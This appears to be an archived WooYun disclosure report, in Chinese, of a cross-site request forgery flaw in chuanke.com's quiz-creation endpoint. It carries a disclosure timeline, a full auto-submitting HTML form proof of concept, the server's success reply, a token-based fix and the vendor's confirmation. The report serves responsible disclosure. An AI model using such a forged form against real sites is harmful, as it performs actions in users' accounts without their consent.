乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-09: 细节已通知厂商并且等待厂商处理中 2014-09-09: 厂商已经确认,细节仅向厂商公开 2014-09-19: 细节向核心白帽子及相关领域专家公开 2014-09-29: 细节向普通白帽子公开 2014-10-09: 细节向实习白帽子公开 2014-10-24: 细节向公众公开
有礼物吗,哈哈
还是我们的大百度3000美元买下的传课网桌面新建一个 baidu.html 构造我们的poc
<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><body><form name="csrf" action="http://www.chuanke.com/?mod=quiz&act=quizlib&do=create" method="POST"><input type=text name="type" value="1"></input><input type=text name="question" value="%3Cp%3Ewooyuntest%3Cbr%3E%3C%2Fp%3E"></input><input type=text name="options" value="wooyuntest%24~%23~%24wooyuntest%24~%23~%24wooyuntest%24~%23~%24wooyuntest"></input><input type=text name="explanation" value="%3Cp%3Ewooyuntest%3Cbr%3E%3C%2Fp%3E"></input><input type=text name="correct" value="2"></input><input type=text name="classid" value="undefined"></input><input type="submit" value="submit" /></form><script>document.csrf.submit();</script></body></html>
先看看我们的地方,有没发表啥东西
OK,是空白的我们访问一下。
返回如下信息,是成功还是失败呢。。 我们看下
{"code":0,"data":"\u521b\u5efa\u6210\u529f"}
加上个随机的token就OK
危害等级:低
漏洞Rank:2
确认时间:2014-09-09 13:57
感谢提交,我们会尽快处理此问题。
暂无